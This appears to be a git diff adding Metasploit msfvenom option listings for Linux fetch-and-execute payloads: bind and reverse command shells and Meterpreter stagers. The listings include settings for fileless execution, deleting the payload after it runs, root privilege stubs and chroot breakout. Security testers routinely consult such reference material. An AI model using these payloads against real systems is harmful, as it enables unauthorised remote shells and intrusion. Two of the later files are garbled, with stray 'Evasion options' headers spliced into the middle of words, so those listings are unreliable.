a/msfvenom/payload_options/cmd-linux-http-x86-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell_bind_tcp.txt new file mode 100644 index 0000000..b416c1f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell_bind_tcp.txt @@ -0,0 +1,80 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/http/x86/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME TJAoCNlYq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell_bind_tcp_random_port.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell_bind_tcp_random_port.txt new file mode 100644 index 0000000..b20690a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell_bind_tcp_random_port.txt @@ -0,0 +1,77 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Random Port Inline + Module: payload/cmd/linux/http/x86/shell_bind_tcp_random_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Geyslan G. Bem + Aleh Boitsau + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME JeFkohSq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + + Listen for a connection in a random port and spawn a command shell. + Use nmap to discover the open port: 'nmap -sS target -p-'. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell_find_port.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell_find_port.txt new file mode 100644 index 0000000..147798e --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell_find_port.txt @@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Linux Command Shell, Find Port Inline + Module: payload/cmd/linux/http/x86/shell_find_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 39836 no The local client port +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ooCCdOcJCmDt no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell_find_tag.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell_find_tag.txt new file mode 100644 index 0000000..69f75ac --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell_find_tag.txt @@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Linux Command Shell, Find Tag Inline + Module: payload/cmd/linux/http/x86/shell_find_tag + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME qhrtaensuGLm no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a shell on an established connection (proxy/NAT safe) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + TAG zwyd yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell_reverse_tcp.txt new file mode 100644 index 0000000..d7a466b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell_reverse_tcp.txt @@ -0,0 +1,89 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/http/x86/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + joev + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD /bin/sh yes The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME WCKIPliQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell_reverse_tcp_ipv6.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell_reverse_tcp_ipv6.txt new file mode 100644 index 0000000..09ba970 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell_reverse_tcp_ipv6.txt @@ -0,0 +1,87 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline (IPv6) + Module: payload/cmd/linux/http/x86/shell_reverse_tcp_ipv6 + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Matteo Malvica + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME dIcIVvOhoFof no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Connect back to attacker and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..32edb12 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter-reverse_tcp.txt @@ -0,0 +1,105 @@ + + Name: HTTPS Fetch, Reverse TCP Stager + Module: payload/cmd/linux/https/aarch64/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Norma +Evasion options for payload/cmd/linux/https/aarch64/meterpreter/reverse_tcp: +========================= + +c options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME liWpDnobGB no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTPS server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..8e68fa8 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter_reverse_http.txt @@ -0,0 +1,109 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/aarch64/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/https/aarch64/meterpreter_reverse_http: +========================= + +rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME THGriYheJPZd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch 